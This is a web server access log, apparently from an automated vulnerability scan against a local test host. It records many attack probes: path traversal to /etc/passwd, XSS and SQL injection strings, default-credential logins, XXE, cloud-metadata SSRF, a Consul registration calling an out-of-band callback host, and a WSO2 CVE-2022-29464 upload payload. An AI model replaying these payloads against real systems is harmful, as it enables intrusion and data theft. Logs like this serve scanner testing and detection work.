"http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /node_modules/../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sess-bin/login_session.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/jtfwrepo.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /comm.php?id=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xxl-job-admin/toLogin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servicedesk/customer/portal/10/user/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /carbon/admin/login_action.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"{}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /aura HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/subscriptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openapi.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lucee/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('29KBxbiY4YDrzCIIqrP1ZxY4GRY')%3elujb7/admin/imgProcess.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib/upgrade.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /runningpods/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dotAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////example.com@/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download/index.php?file=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"{\x0D\x0A \x22ID\x22: \x2229KBxYKHqL2IdephZGFH5Bc6Uv7\x22,\x0D\x0A \x22Name\x22: \x2229KBxYKHqL2IdephZGFH5Bc6Uv7\x22,\x0D\x0A \x22Address\x22: \x22127.0.0.1\x22,\x0D\x0A \x22Port\x22: 80,\x0D\x0A \x22check\x22: {\x0D\x0A \x22script\x22: \x22nslookup ca28bc0smpvbbtig07h0wxbj8d6nx48bn.oast.pro\x22,\x0D\x0A \x22interval\x22: \x2210s\x22,\x0D\x0A \x22Timeout\x22: \x2286400s\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /v1/agent/service/register HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+547653*865674+as+id HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"{}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /s/sfsites/aura HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?login=lutron&password=lutron HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/apidocs/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wt3/forceSave.php?file=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.css?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/privatekey.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"{'jql':'project in projectsLeadByUser(\x2229KBxcvcXYlRwsHrihUOD2aWYss\x22)'}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /rest/issueNav/1/issueTable HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /storage/logs/laravel.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /profile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /messages HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////http://127.0.0.1example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crowd/console/login.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adminer.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"{}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sfsites/aura HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"\x0D\x0A]>\x0D\x0A\x0D\x0A\x0D\x0Aaaaaa\x0D\x0A&xxe;\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /Autodiscover/Autodiscover.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/apidocs/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.js?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/computeMetadata/v1/project/ HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.228","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/latest/meta-data/ HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.307","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backend HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?action=stream HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /DesktopModule/UIQuestionControls/UIAskQuestion/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"fullPath=/etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /client/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-----------------------------250033711231076532771336998311\x0D\x0AContent-Disposition: form-data; name=\x22../../../../repository/deployment/server/webapps/authenticationendpoint/29kbxycynhcej128jm0x3xtvfe3.jsp\x22;filename=\x22test.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<% out.print(\x22WSO2-RCE-CVE-2022-29464\x22); %>\x0D\x0A-----------------------------250033711231076532771336998311--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileupload/toolsAny HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/profile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 